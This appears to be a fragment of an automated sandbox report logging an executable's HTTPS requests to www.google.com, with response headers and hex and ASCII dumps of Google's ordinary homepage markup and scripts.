                                                                                                                                                                                                                Data Ascii: tLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===vo
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                Data Ascii: b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61
                                                                                                                                                                                                                Data Ascii: x;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opa
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f
                                                                                                                                                                                                                Data Ascii: adding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-to
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62
                                                                                                                                                                                                                Data Ascii: line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62
                                                                                                                                                                                                                Data Ascii: t:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebeb
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78
                                                                                                                                                                                                                Data Ascii: top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                12192.168.2.649722142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1192INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-clKg_aC_uKcikfftopKvqA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-Wn0IaXxLbc0_9ttjL9ELGG_DZRH_08DiGcHA-oCYmt9hAPtlNqyg; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=sq23VLVU1SamMhgX-C86JXLojhTwHnFzvSnEq3Gjc5OZKFBT_T5AVR_sHaGrg6nopBXnC13slkobA5aYNPg4OGHetV4Dfy4OGfF_9UpGFTqNRoiUMWrQtWZfdY1mFN17jzF9c8KKZyMCVKdpodfEDN8AmUmaPrOiT8HqCUqYd8jgPrZr_1KbPqbUyBTJtVUz8vX9s6EJGQ85; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC198INData Raw: 34 64 36 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61
                                                                                                                                                                                                                Data Ascii: 4d66<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has ma
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f
                                                                                                                                                                                                                Data Ascii: ny special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 35 35 38 2c 31 31 2c 31 37 39 31 2c 32 34 38 2c 33 32 37 2c 31 35 32 2c 32 37 35 2c 31 2c 38 36 2c 31 30 36 39 2c 32 2c 36 30 2c 31 39 31 2c 31 31 34 32 2c 31 34 32 2c 32 35 36 2c 33 34 36 2c 36 31 2c 32 36 2c 31 36 37 2c 32 32 31 2c 36 38 34 2c 38 30 31 2c 33 32 2c 32 35 38 2c 31 33 36 30 2c 31 34 38 36 2c 34 36 39 2c 39 31 36 2c 36 2c 31 32 39 2c 31 37 2c 33 2c 33 31 38 2c 34 36 33 2c 31 35 2c 31 37 34 31 2c 39 31 33 2c 35 38 33 2c 39 33 2c 31 36 38 2c 33 2c 34 31 30 2c 36 38 39 2c 39 31 39 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 32 2c 36 38 37 2c 34 31 2c 36 34 36 2c 34 2c 31 36 31 2c 35 30 2c 38 2c 34 39 38 2c 33 30 38 2c 33 33 34 2c 31 32 2c 31 2c 31 2c 35 2c 37 37 2c 32 31 30 2c 36 32 38 2c 38 31 2c 32 33 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31
                                                                                                                                                                                                                Data Ascii: 558,11,1791,248,327,152,275,1,86,1069,2,60,191,1142,142,256,346,61,26,167,221,684,801,32,258,1360,1486,469,916,6,129,17,3,318,463,15,1741,913,583,93,168,3,410,689,919,1,5,4,4,4,162,687,41,646,4,161,50,8,498,308,334,12,1,1,5,77,210,628,81,23,2,1,2,2,2,3,41
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69
                                                                                                                                                                                                                Data Ascii: l};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(thi
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39
                                                                                                                                                                                                                Data Ascii: </script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-99
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67
                                                                                                                                                                                                                Data Ascii: city:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;rig
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68
                                                                                                                                                                                                                Data Ascii: 0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(h
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f
                                                                                                                                                                                                                Data Ascii: in-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https:/
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30
                                                                                                                                                                                                                Data Ascii: ebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64
                                                                                                                                                                                                                Data Ascii: px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;pad


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                13192.168.2.649724142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-qMIslwQoDOPMBLtidScC4Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-VBdNof8WnY0jYa6LitGjfH518D7CCxQgYa7H7YMmBaGDoE7iFzPfc; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=k3eoMLl2dXuNiiod0P64plK_ynq6ONzcm7fQ5sVw6GObmloNkd7IfprTc4DR72yshoJdARsCdBwy6E-_-t9Q5bBiQJBNReZdBh0UCwFQFvvNefcIffW0JmbS2KpzN7IVzcNEzwhkearVD4GZf-TGQBV4XrnZ9PM1o08d-Gl83DU_bbYiR0Z5MGG-7jW7t6urOedv5OHOTD4PBA; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
